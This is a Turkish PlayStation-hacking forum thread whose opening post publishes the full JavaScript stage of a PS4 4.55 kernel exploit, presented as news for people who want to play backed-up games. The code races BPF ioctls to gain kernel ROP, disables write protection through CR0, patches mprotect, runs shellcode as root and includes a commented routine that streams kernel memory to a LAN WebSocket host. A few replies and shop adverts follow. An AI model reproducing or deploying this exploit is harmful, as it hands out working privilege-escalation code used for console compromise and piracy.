Close

ETİKETLENEN KULLANICILAR LİSTESİ

Toplam 5 adet sonuctan sayfa basi 1 ile 5 arasi kadar sonuc gösteriliyor
 1. #1
  Status
  Offline
  mctunax - ait Kullanıcı Resmi (Avatar)
  mctunax

  WWW.MCPS4.COM
  Üyelik tarihi
  Mar 2008
  Mesajlar
  8.389
  Ettiği Teşekkür
  2.119
  Aldığı Teşekkür
  38.863
  Blog Entries
  3
  Dedikoduları
  299 Post(s)
  Etiketlenmeleri
  11 Thread(s)

  PS4 4.55 Kernel Exploit Qwertyoruiop Çıktı

  PS4 4.55 Kernel Exploit Qwertyoruiop Çıktı  PS4 4.05 versionun kırılmasının ardından çok fazla zaman geçmeden PS4 4.55 version için Kernel Exploit yayımlandı

  Kod:
  function stage4_()
  {
    function malloc(sz)
    {
      var backing = new Uint8Array(1000+sz);
      window.nogc.push(backing);
      var ptr = p.read8(p.leakval(backing).add32(0x10));
      ptr.backing = backing;
      return ptr;
    }
    function malloc32(sz)
    {
      var backing = new Uint8Array(0x1000+sz*4);
      window.nogc.push(backing);
      var ptr = p.read8(p.leakval(backing).add32(0x10));
      ptr.backing = new Uint32Array(backing.buffer);
      return ptr;
    }
    var strcpy_helper = new Uint8Array(0x1000);
    var where_writeptr_strcpy = p.leakval(strcpy_helper).add32(0x10);
    function strcpy(ptr, str)
    {
      p.write8(where_writeptr_strcpy, ptr);
      for (var i = 0; i < str.length; i++)
        strcpy_helper[i] = str.charCodeAt(i) & 0xFF;
      strcpy_helper[str.length] = 0;
    }
   
   
    var sysctlbyname = window.libKernelBase.add32(0xF290);
    var sysreq = malloc32(0x10);
    sysreq.backing[0] = 7;
    sysreq.backing[1] = 0;
    sysreq.backing[4] = 0x10;
   
    var retv = malloc(0x100);
    var __errno_ptr = p.fcall(window.libKernelBase.add32(0x2BE0));
   
   
    var rv = p.fcall(sysctlbyname, p.sptr("machdep.openpsid"), retv, sysreq.add32(0x10), 0, 0);
   
    var str = "";
    for (var i=0; i<0x10; i++)
    {
      str += zeroFill(retv.backing[i].toString(16),2) + " ";
    }
   
    // log("psid: " + str)
   
    var fd = p.syscall("open", p.sptr("/dev/bpf0"), 2).low;
    var fd1 = p.syscall("open", p.sptr("/dev/bpf0"), 2).low;
    if (fd == (-1 >>> 0))
    {
      print("kexp failed: no bpf0");
    }
  //  print("fd: " + fd);
   
    var scratch = malloc(0x100);
    var ifname = malloc(0x10);
    strcpy(ifname, "wlan0");
    p.syscall("ioctl", fd, 0x8020426c, ifname);
    var ret = p.syscall("write", fd, scratch, 40);
    if (ret.low == (-1 >>> 0))
    {
      strcpy(ifname, "eth0");
      p.syscall("ioctl", fd, 0x8020426c, ifname);
      var ret = p.syscall("write", fd, scratch, 40);
      if (ret.low == (-1 >>> 0))
      {
        throw "kexp failed :(";
      }
    }
   
    var assertcnt = 0;
    var assert = function(x)
    {
      assertcnt++;
      if (!x) throw "assertion " + assertcnt + " failed";
    }
  
    print("got it");
   
    var bpf_valid = malloc32(0x4000);
    var bpf_valid_u32 = bpf_valid.backing;
    var bpf_valid_prog = malloc(0x40);
    p.write8(bpf_valid_prog, 64)
    p.write8(bpf_valid_prog.add32(8), bpf_valid)
   
    for (var i = 0 ; i < 0x4000; )
    {
      bpf_valid_u32[i++] = 6; // BPF_RET
      bpf_valid_u32[i++] = 0;
    }
   
    var bpf_invalid = malloc32(0x4000);
    var bpf_invalid_u32 = bpf_invalid.backing;
    var bpf_invalid_prog = malloc(0x40);
    p.write8(bpf_invalid_prog, 64)
    p.write8(bpf_invalid_prog.add32(8), bpf_invalid)
   
    for (var i = 0 ; i < 0x4000; )
    {
      bpf_invalid_u32[i++] = 4; // NOP
      bpf_invalid_u32[i++] = 0;
    }
   
    var push_bpf = function(bpfbuf, cmd, k)
    {
      var i = bpfbuf.i;
      if (!i) i=0;
      bpfbuf[i*2] = cmd;
      bpfbuf[i*2+1] = k;
      bpfbuf.i = i+1;
    }
   
    push_bpf(bpf_invalid_u32, 5, 2); // jump
    push_bpf(bpf_invalid_u32, 0x12, 0); // invalid opcode
    bpf_invalid_u32.i = 16;
  
    var bpf_write8imm = function(bpf, offset, imm)
    {
      if (!(imm instanceof int64))
      {
        imm = new int64(imm,0);
      }
      push_bpf(bpf, 0, imm.low); // BPF_LD|BPF_IMM
      push_bpf(bpf, 2, offset); // BPF_ST
      push_bpf(bpf, 0, imm.hi); // BPF_LD|BPF_IMM
      push_bpf(bpf, 2, offset+1); // BPF_ST -> RDI: pop rsp
    }
   
    var bpf_copy8 = function(bpf, offset_to, offset_from)
    {
      push_bpf(bpf, 0x60, offset_from); // BPF_LD|BPF_MEM
      push_bpf(bpf, 2, offset_to); // BPF_ST
      push_bpf(bpf, 0x60, offset_from+1); // BPF_LD|BPF_MEM
      push_bpf(bpf, 2, offset_to+1); // BPF_ST
    }
    var bpf_add4 = function(bpf, offset, val)
    {
      push_bpf(bpf, 0x60, offset); // BPF_LD
      push_bpf(bpf, 0x4, val); // BPF_ALU|BPF_ADD|BPF_K
      push_bpf(bpf, 2, offset); // BPF_ST
    }
   
   
   
    var krop_off_init = 0x1e;
    var krop_off = krop_off_init;
    var reset_krop = function() {
      krop_off = krop_off_init;
      bpf_invalid_u32.i = 16;
    }
    var push_krop = function(value)
    {
      bpf_write8imm(bpf_invalid_u32, krop_off, value);
      krop_off += 2;
    }
    var push_krop_fromoff = function(value)
    {
      bpf_copy8(bpf_invalid_u32, krop_off, value);
      krop_off += 2;
    }
    var finalize_krop = function(retv)
    {
      if(!retv) retv = 5;
      push_bpf(bpf_invalid_u32, 6, retv); // return 5
    }
  
    var rtv = p.syscall("ioctl", fd, 0x8010427B, bpf_valid_prog);
    assert(rtv.low == 0);
   
    rtv = p.syscall("write", fd, scratch, 40);
    assert(rtv.low == (-1 >>> 0));
   
    var kscratch = malloc32(0x80);
   
    var kchain = new window.RopChain();
   
    kchain.clear();
    kchain.push(window.gadgets["ret"]);
    kchain.push(window.gadgets["ret"]);
    kchain.push(window.gadgets["ret"]);
    kchain.push(window.webKitBase.add32(0x3EBD0));
  
    reset_krop();
    //push_krop(window.gadgets["infloop"]); // 8
    bpf_copy8(bpf_invalid_u32, 0, 0x1e);
    push_krop(window.gadgets["pop rsi"]); // 0x10
    push_krop_fromoff(0);
    push_krop(window.gadgets["pop rsp"]);
    push_krop(kchain.ropframeptr); // 8
  
    finalize_krop(0);
   
    var spawnthread = function(chain) {
    
      /*
     
     
       seg000:00000000007FA7D0             sub_7FA7D0   proc near        ; DATA XREF: sub_7F8330+5Eo
       seg000:00000000007FA7D0 55                   push  rbp
       seg000:00000000007FA7D1 48 89 E5                mov   rbp, rsp
       seg000:00000000007FA7D4 41 56                  push  r14
       seg000:00000000007FA7D6 53                   push  rbx
       seg000:00000000007FA7D7 48 89 F3                mov   rbx, rsi
       seg000:00000000007FA7DA 49 89 FE                mov   r14, rdi
       seg000:00000000007FA7DD 48 8D 35 E5 B3 EC 00          lea   rsi, aMissingPlteBef ; "Missing PLTE before tRNS" < search this
     
     
       -> xref of sub_7FA7D0:
     
     
       seg000:00000000007F8380 48 8D 3D 28 D8 EC 00          lea   rdi, a1_5_18_0 ; "1.5.18"
       seg000:00000000007F8387 48 8D 15 82 23 00 00          lea   rdx, sub_7FA710
       seg000:00000000007F838E 48 8D 0D 3B 24 00 00          lea   rcx, sub_7FA7D0
       seg000:00000000007F8395 31 F6                  xor   esi, esi
       seg000:00000000007F8397 49 C7 47 20 00 00 00 00         mov   qword ptr [r15+20h], 0
       seg000:00000000007F839F 66 41 C7 47 18 00 00          mov   word ptr [r15+18h], 0
       seg000:00000000007F83A6 49 C7 47 10 00 00 00 00         mov   qword ptr [r15+10h], 0
       seg000:00000000007F83AE E8 8D 3C D3 00             call  sub_152C040
     
       -> code:
     
       m_png = png_create_read_struct(PNG_LIBPNG_VER_STRING, 0, decodingFailed, decodingWarning);
     
     
       decodingWarning -> sub_7FA7D0 (where Missing PLTE before tRNS is referenced)
     
       decodingFailed -> contains longjmp (which we want)
     
       seg000:00000000007FA710             sub_7FA710   proc near        ; DATA XREF: sub_7F8330+57o
       seg000:00000000007FA710                                 ; sub_7F9DC0+2Eo
       seg000:00000000007FA710 55                   push  rbp
       seg000:00000000007FA711 48 89 E5                mov   rbp, rsp
       seg000:00000000007FA714 48 8B 35 5D B6 E5 02          mov   rsi, cs:qword_3655D78
       seg000:00000000007FA71B BA 60 00 00 00             mov   edx, 60h ; '`'
       seg000:00000000007FA720 E8 AB E6 D2 00             call  sub_1528DD0
       seg000:00000000007FA725 BE 01 00 00 00             mov   esi, 1
       seg000:00000000007FA72A 48 89 C7                mov   rdi, rax
       seg000:00000000007FA72D E8 26 6D 80 FF             call  sub_1458 < longjmp
       seg000:00000000007FA732 0F 0B                  ud2
       seg000:00000000007FA732             sub_7FA710   endp
     
     
       */
      var longjmp = webKitBase.add32(0x1458);
    
    
      // ThreadIdentifier createThread(ThreadFunction entryPoint, void* data, const char* name)
      /*
       seg000:00000000001DD17F 48 8D 15 C9 38 4C 01          lea   rdx, aWebcoreGccontr ; "WebCore: GCController" < search this
       seg000:00000000001DD186 31 F6                  xor   esi, esi
       seg000:00000000001DD188 E8 B3 1B F9 00             call  sub_116ED40 < createThread
       */
    
      var createThread = window.webKitBase.add32(0x116ED40);
    
      var contextp = malloc32(0x2000);
      var contextz = contextp.backing;
      contextz[0] = 1337;
    
      var thread2 = new RopChain();
      thread2.clear();
      thread2.push(window.gadgets["ret"]); // nop
      thread2.push(window.gadgets["ret"]); // nop
      thread2.push(window.gadgets["ret"]); // nop
      thread2.push(window.gadgets["ret"]); // nop
      chain(thread2);
    
      p.write8(contextp, window.gadgets["ret"]); // rip -> ret gadget
      p.write8(contextp.add32(0x10), thread2.ropframeptr); // rsp
    
      p.fcall(createThread, longjmp, contextp, p.sptr("GottaGoFast"));
    
      window.nogc.push(contextz);
      window.nogc.push(thread2);
    
      return thread2;
    }
   
    var interrupt1 = 0;
    var interrupt2 = 0;
    // ioctl() with valid BPF program -> will trigger reallocation of BFP code alloc
    spawnthread(function(thread2){
          interrupt1 = thread2.ropframeptr;
          thread2.push(window.gadgets["pop rdi"]); // pop rdi
          thread2.push(fd); // what
          thread2.push(window.gadgets["pop rsi"]); // pop rsi
          thread2.push(0x8010427B); // what
          thread2.push(window.gadgets["pop rdx"]); // pop rdx
          thread2.push(bpf_valid_prog); // what
          thread2.push(window.gadgets["pop rsp"]); // pop rdx
          thread2.push(thread2.ropframeptr.add32(0x800)); // what
          thread2.count = 0x100;
          var cntr = thread2.count;
          thread2.push(window.syscalls[54]); // ioctl
          thread2.push_write8(thread2.ropframeptr.add32(cntr*8), window.syscalls[54]); // restore ioctl
        
          thread2.push(window.gadgets["pop rsp"]); // pop rdx
          thread2.push(thread2.ropframeptr); // what
          })
   
    // ioctl() with invalid BPF program -> this will be executed when triggering bug
    spawnthread(function(thread2){
          interrupt2 = thread2.ropframeptr;
          thread2.push(window.gadgets["pop rdi"]); // pop rdi
          thread2.push(fd1); // what
          thread2.push(window.gadgets["pop rsi"]); // pop rsi
          thread2.push(0x8010427B); // what
          thread2.push(window.gadgets["pop rdx"]); // pop rdx
          thread2.push(bpf_invalid_prog); // what
          thread2.push(window.gadgets["pop rsp"]); // pop rdx
          thread2.push(thread2.ropframeptr.add32(0x800)); // what
          thread2.count = 0x100;
          var cntr = thread2.count;
          thread2.push(window.syscalls[54]); // ioctl
          thread2.push_write8(thread2.ropframeptr.add32(cntr*8), window.syscalls[54]); // restore ioctl
        
          thread2.push(window.gadgets["pop rsp"]); // pop rdx
          thread2.push(thread2.ropframeptr); // what
          })
  
    function kernel_rop_run(cb)
    {
      kchain.clear();
      kchain.push(window.gadgets["ret"]);
      kchain.push(window.gadgets["ret"]);
      kchain.push(window.gadgets["ret"]);
      kchain.push(window.gadgets["ret"]);
      kchain.push(window.gadgets["ret"]);
      kchain.push(window.gadgets["ret"]);
      cb(kchain);
      kchain.push(window.gadgets["pop rax"]);
      kchain.push(0);
      kchain.push(window.gadgets["ret"]);
      kchain.push(window.webKitBase.add32(0x3EBD0));
      while(1)
      {
        if (p.syscall(4, fd, scratch, 40).low == 40)
        {
          return p.read8(kscratch);
          break;
        }
      }
    }
    function leak_kern_rip() {
      return kernel_rop_run(function(kchain)
                 {
                 kchain.push(window.gadgets["pop rdi"]);
                 kchain.push(kscratch);
                 kchain.push(window.gadgets["mov [rdi], rsi"]);
                 });
    }
   
    function kernel_read8(addr) {
      return kernel_rop_run(function(kchain)
                 {
                 kchain.push(window.gadgets["pop rdi"]);
                 kchain.push(addr);
                 kchain.push(window.webKitBase.add32(0x13A220)); // deref
                 kchain.push(window.gadgets["pop rdi"]);
                 kchain.push(kscratch);
                 kchain.push(window.gadgets["mov [rdi], rax"]);
                 });
    }
    function kernel_memcpy(to,from,size) {
      return kernel_rop_run(function(kchain)
                 {
                 kchain.push(window.gadgets["pop rdi"]);
                 kchain.push(to);
                 kchain.push(window.gadgets["pop rsi"]);
                 kchain.push(from);
                 kchain.push(window.gadgets["pop rdx"]);
                 kchain.push(size);
                 kchain.push(window.gadgets["memcpy"]);
                 kchain.push(window.gadgets["mov [rdi], rax"]);
                 });
    }
    var kern_base = leak_kern_rip();
    kern_base.low &= 0xffffc000;
    kern_base.low -= 0x164000;
    log("ay! " + kernel_read8(kern_base) + " " + kern_base);
   
    /*
    var chunksz = 0x40000;
    var pagebuf = malloc(chunksz);
   
    connection = new WebSocket('ws://192.168.0.125:8080');
    connection.binaryType = "arraybuffer";
    connection.onmessage = function() {
      try {
        kernel_memcpy(pagebuf, kern_base, chunksz);
        connection.send(new Uint8Array(pagebuf.backing.buffer, 0, chunksz));
        kern_base.add32inplace(chunksz);
      }catch(e) {log(e);}
    }
   
   
     LOAD:FFFFFFFF9144CF70 0F 20 C0                mov   rax, cr0
     LOAD:FFFFFFFF9144CF73 48 0D 2A 00 05 00            or   rax, 5002Ah
     LOAD:FFFFFFFF9144CF79 0F 22 C0                mov   cr0, rax
     LOAD:FFFFFFFF9144CF7C C3                   retn
     FFFFFFFF91562A58
     */
    var getset_cr0 = kern_base.add32(0x280f70);
    var set_cr0 = kern_base.add32(0x280f79);
   
    function kernel_get_cr0() {
      return kernel_rop_run(function(kchain)
                 {
                 kchain.push(getset_cr0);
                 kchain.push(window.gadgets["pop rdi"]);
                 kchain.push(kscratch);
                 kchain.push(window.gadgets["mov [rdi], rax"]);
                 });
    }
  
    var cr0val = kernel_get_cr0();
    cr0val.low &= ((~(1 << 16)) >>> 0);
    log("cr0: " + cr0val);
    function kernel_write8_cr0(addr, val) {
      return kernel_rop_run(function(kchain)
                 {
                 kchain.push(window.gadgets["pop rax"]);
                 kchain.push(cr0val);
                 kchain.push(set_cr0);
                 kchain.push(window.gadgets["pop rdi"]);
                 kchain.push(addr);
                 kchain.push(window.gadgets["pop rax"]);
                 kchain.push(val);
                 kchain.push(window.gadgets["mov [rdi], rax"]);
                 kchain.push(getset_cr0);
                 });
    }
    function kernel_fcall(addr, arg0, arg1) {
      return kernel_rop_run(function(kchain)
                 {
                 if(arg0)
                 {
                    kchain.push(window.gadgets["pop rdi"]);
                    kchain.push(arg0);
                 }
                 if(arg1)
                 {
                    kchain.push(window.gadgets["pop rsi"]);
                    kchain.push(arg1);
                 }
                 kchain.push(addr);
               
                 kchain.push(window.gadgets["pop rdi"]);
                 kchain.push(kscratch);
                 kchain.push(window.gadgets["mov [rdi], rax"]);
                 });
    }
   
    var mprotect_patchloc = kern_base.add32(0x396a58);
    var mprotect_patchbytes = kernel_read8(mprotect_patchloc);
    var mprotect_realbytes = mprotect_patchbytes;
   
    log("patchbytes: " + mprotect_patchbytes);
    mprotect_patchbytes.low = 0x90909090;
    mprotect_patchbytes.hi &= 0xffff0000;
    mprotect_patchbytes.hi |= 0x00009090;
   
   
    var shellsize = window.shellcode.byteLength;
    shellsize += 0x4000;
    shellsize &= 0xffffc000;
   
    var shellscratch_to = malloc32((0x10000 + shellsize)/4);
   
    var origin_to = shellscratch_to.low;
    shellscratch_to.low &= 0xffffc000;
    shellscratch_to.low += 0x8000;
    var offset = (shellscratch_to.low - origin_to) / 4;
   
    for (var i=0; i < window.shellcode.length; i++)
    {
      shellscratch_to.backing[i+offset] = window.shellcode[i];
    }
   
   
    kernel_write8_cr0(mprotect_patchloc,mprotect_patchbytes);
    var mapz = p.syscall("mprotect", shellscratch_to, shellsize, 7);
    kernel_write8_cr0(mprotect_patchloc,mprotect_realbytes);
    if (mapz.low != 0) throw "mprot fail!";
  
    faultme = shellscratch_to.add32(0x0);
  
    for (var i=0; i < window.shellcode.length; i+= 0x1000)
    {
      var bck = p.read8(faultme);
      p.write8(faultme, 0xc3)
      p.fcall(faultme); // test faulting
      p.write8(faultme, bck)
    }
    p.syscall("mlock", shellscratch_to, shellsize);
    var pyld_buf = p.read8(p.leakval(window.pyld).add32(0x10));
  
    var zarguments = malloc32(0x1000);
    p.write8(zarguments, kern_base);
    p.write8(zarguments.add32(8), fd_kcall);
    p.write8(zarguments.add32(16), interrupt1);
    p.write8(zarguments.add32(24), interrupt2);
    p.write8(zarguments.add32(32), window.syscalls[431]);
    p.write8(zarguments.add32(40), window.syscalls[591]);
    p.write8(zarguments.add32(48), window.syscalls[594]);
    p.write8(zarguments.add32(56), pyld_buf); // pyld
    p.write8(zarguments.add32(64), window.pyldpoint);
    p.write8(zarguments.add32(72), window.pyld.byteLength);
  
    var fd_kcall = p.syscall("open", p.sptr("/dev/bpf0"), 2).low;
  
    log(p.read8(shellscratch_to.add32(window.entrypoint)));
    log("kernel shellcode: " + kernel_fcall(shellscratch_to.add32(window.entrypoint), 1, zarguments));
    p.syscall("setuid", 0);
    log("uid: " + p.syscall("getuid"));
    alert("enter user");
    log("user shellcode: " + p.fcall(shellscratch_to.add32(window.entrypoint), 2, zarguments));
  
    var lsscrtch32 = new Uint32Array(0x400);
    var lsscrtch = p.read8(p.leakval(lsscrtch32).add32(0x10));
    window.ls = function(path)
    {
      var sep = "/"
      if (path[path.length-1]=="/") sep = "";
    
      var fd = p.syscall("open", p.sptr(path), 0x1100004).low;
      if (fd == (-1 >>> 0))
      {
        print("open("+path+"): -1");
        return;
      }
    
      alert("getdenv");
    
      print("Directory listing for " +path+":");
      var total = p.syscall("getdents", fd, lsscrtch, 0x1000).low;
      if (total == (-1 >>> 0))
      {
        print("getdents("+path+"): -1");
        return;
      }
    
      alert("got denv");
    
      var offset = 0;
      while (offset < total)
      {
        var cur = lsscrtch.add32(offset);
        var reclen = p.read4(cur.add32(4)) & 0xFFFF;
        var filepath = path + sep + p.readstr(cur.add32(8));
        print("<a href=javascript:window.ls('" + filepath + "');>" + filepath + "</a>");
        offset += reclen;
        if(!reclen) break;
      }
      p.syscall("close", fd);
    }
    print("<a href=javascript:window.ls('/');>ls /</a>");
  
  }
  PS4 Kernel Exploit yayımlanmasının ardından PS4 4.55 sahipleride bu güzel haber sayesinde konsollarında yedeklenmiş oyunlarını oynayabilecekler

  PS4 4.55 Kernel Exploit yayımlanması ile Nioh, Nier, Hitman ve Persone 5 oyunlarıda oynanabilecek

  PS4 Pro modellerinde de yedeklenmiş oyunlar oynanabilecek tabi bu şimdilik 4.55 version dan daha yüksek konsollar için geçerli değil

  Önümüzdeki zaman içerisinde PS4 yüksek sürümlerde 4.55 üzeri ve 5.05 version için durum ne olur bilinmez fakat gelişmeler oldukça güzel

  Haberin kaynağı aşağıdaki bağlantıdadır

  [Linkleri Sadece Kayıtlı Üyeler Görebilir. Üye Olmak için Tiklayın]
  Konu Bilgileri

  Tüm forumdan rastgele konular:

  • » The Walking Dead PSN Episodes 1 / 2 / 3...
  • » Battery Xmb PSP..
  • » 6.35 - 6.20 Dev Tema Arşivi
  • » Call Of Duty: Roads To Victory | Psp |...
  • » Konami, UEFA ile Olan Anlaşmasını Uzattı
  • » imposible2011 tripped AE detector
  • » volkanaktan tripped AE detector
  • » Paypal Fazla Para Çekti ININAL
  • » Kings Of Leon - Notion
  • » mafia 2 (istek)

  Aynı kategoriden rastgele konular:

  • » PS4 PKG Oyunlar Burada
  • » PS4 5.05 downgrade 4.05
  • » PS4 KIRILDI (PS4 MTX Key Chinese...
  • » PS4 Gameboy Emülatör
  • » PS4 5.05 Kırma Rehberi
  • » Ps4 downgrade 5.05 to 4.55
  • » PS4 İçin Önemli Gelişme SKFU (Install...
  • » Video: PS4 Package Installer Tutorial...
  • » Firmware 2.0 arifesi, PlayStation 4...
  • » PS4 5.05 Versionda Kopya Oyun...

  MCTUNA ADRES ve İLETİŞİM BİLGİLERİ HEMEN AŞAĞIDADIR

  PERPA TİCARET MERKEZİ 13.KAT MAVİ AVLU B BLOK NO: 2391 OKMEYDANI İSTANBUL

  GSM: 0553-618-70-70 + WHATSAPP


  PS4 KIRDIRMAK İÇİN TIKLAYINIZ

  PS4 OYUN YÜKLETMEK İÇİN TIKLAYINIZ

  KIRIK PS4 SATIN ALMAK İÇİN TIKLAYINIZ

  PS3 KIRDIRMAK İÇİN TIKLAYINIZ

  PS3 OYUN YÜKLETMEK İÇİN TIKLAYINIZ

 2. mctunax üyemize teşekkür edenler:
  nate86 (02-27-2018)

 3. #2
  Status
  Offline
  excitir06_84 - ait Kullanıcı Resmi (Avatar)
  Kayıtlı Üye
  Üyelik tarihi
  Aug 2009
  Mesajlar
  317
  Ettiği Teşekkür
  50
  Aldığı Teşekkür
  201
  Dedikoduları
  3 Post(s)
  Etiketlenmeleri
  0 Thread(s)
  Yavaş yavaş yukarı tırmanmaya başladı hadi gayret 5.05

 4. #3
  Status
  Offline
  nate86 - ait Kullanıcı Resmi (Avatar)
  Kayıtlı Üye
  Üyelik tarihi
  Dec 2017
  Mesajlar
  103
  Ettiği Teşekkür
  82
  Aldığı Teşekkür
  24
  Dedikoduları
  3 Post(s)
  Etiketlenmeleri
  0 Thread(s)
  güzel gelişmeler oluyor fakat en nihayetinde debug mod kalıcı değil ve çalıştırılan uygulamalar da sınırlı ama hiç yoktan iyi neyse umarım bütün bu gelişmeler cfw önünü açar

 5. #4
  Status
  Offline
  tkk123456789 - ait Kullanıcı Resmi (Avatar)
  Kayıtlı Üye
  Üyelik tarihi
  Jul 2017
  Mesajlar
  24
  Ettiği Teşekkür
  6
  Aldığı Teşekkür
  2
  Dedikoduları
  0 Post(s)
  Etiketlenmeleri
  0 Thread(s)
  bugun PS4 5.01 WebKit Exploit yayinlandi 5.05 de calisiyormus ben daha denemedim bnde pro var 5.05 cihaza birsey olmasin diye deneyen arkadaslar var sitede bir bakarmisiniz tuna bey

 6. #5
  Status
  Offline
  mctunax - ait Kullanıcı Resmi (Avatar)
  mctunax

  WWW.MCPS4.COM
  Üyelik tarihi
  Mar 2008
  Mesajlar
  8.389
  Ettiği Teşekkür
  2.119
  Aldığı Teşekkür
  38.863
  Blog Entries
  3
  Dedikoduları
  299 Post(s)
  Etiketlenmeleri
  11 Thread(s)

  Herşeyden haberimiz var sabırlı olun arkadaşlar, henüz dosyalar verilmedi 5.05 için, gelişmeleri yazacağız
  MCTUNA ADRES ve İLETİŞİM BİLGİLERİ HEMEN AŞAĞIDADIR

  PERPA TİCARET MERKEZİ 13.KAT MAVİ AVLU B BLOK NO: 2391 OKMEYDANI İSTANBUL

  GSM: 0553-618-70-70 + WHATSAPP


  PS4 KIRDIRMAK İÇİN TIKLAYINIZ

  PS4 OYUN YÜKLETMEK İÇİN TIKLAYINIZ

  KIRIK PS4 SATIN ALMAK İÇİN TIKLAYINIZ

  PS3 KIRDIRMAK İÇİN TIKLAYINIZ

  PS3 OYUN YÜKLETMEK İÇİN TIKLAYINIZ

Konu Bilgileri

Bu Konuya Gözatan Kullanıcılar

Şu anda 1 kullanıcı bu konuyu görüntülüyor. (0 kayıtlı ve 1 misafir)

Bu Konu için Etiketler

Bookmarks

Yetkileriniz

 • Konu Acma Yetkiniz Yok
 • Cevap Yazma Yetkiniz Yok
 • Eklenti Yükleme Yetkiniz Yok
 • Mesajınızı Değiştirme Yetkiniz Yok
 •